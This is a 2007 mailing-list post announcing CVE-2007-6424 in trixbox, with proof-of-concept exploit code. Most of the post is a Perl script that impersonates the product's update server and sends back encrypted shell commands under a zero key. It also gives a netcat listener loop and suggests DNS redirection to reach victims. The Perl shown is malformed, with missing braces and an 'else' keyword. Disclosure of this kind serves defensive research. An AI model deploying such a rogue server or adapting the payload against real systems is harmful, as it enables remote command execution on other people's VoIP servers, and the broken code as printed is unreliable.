[VOIPSEC] trixbox vuln (CVE-2007-6424) - PoC exploit code

Than Taro thanrantaro at live.com
Tue Dec 18 21:25:46 CST 2007

Since Fonality has been incredibly slow in dealing with this (it was
reported publicly on Saturday, and they don't expect to have a fix
until at least Friday), I decided to take it upon myself to get a CVE,
and also
write some exploit code.  I feel that 72+ hours is more than enough
time to fix something this simple.  They also do not appear to have any
intentions of posting an advisory.

Run this in a simple script such as `while :; do netcat -l -p 80 -c
"perl trixbox-exploit.pl"; done`, and then a trivial DNS redirection
can take it from there.

trixbox:~$ cat trixbox-exploit.pl


use strict;

use Crypt::CBC;

my $cipher = Crypt::CBC->new( -cipher => "Blowfish", -key => "00000000000000000000000000000000" );

my $req = <STDIN>;

chomp $req;

my $hax;

if( $req =~ /ce00000000000000000000000000000000/ )


        $hax = $cipher->encrypt( "1\nce00000000000000000000000000000000\necho Exploited" );


elsif( $req =~ /generate_id/ )


        $hax = "ce00000000000000000000000000000000\n00000000000000000000000000000000";




        $hax = "ERROR: invalid server id";


print "$hax";


Share life as it happens with the new Windows Live.

More information about the Voipsec mailing list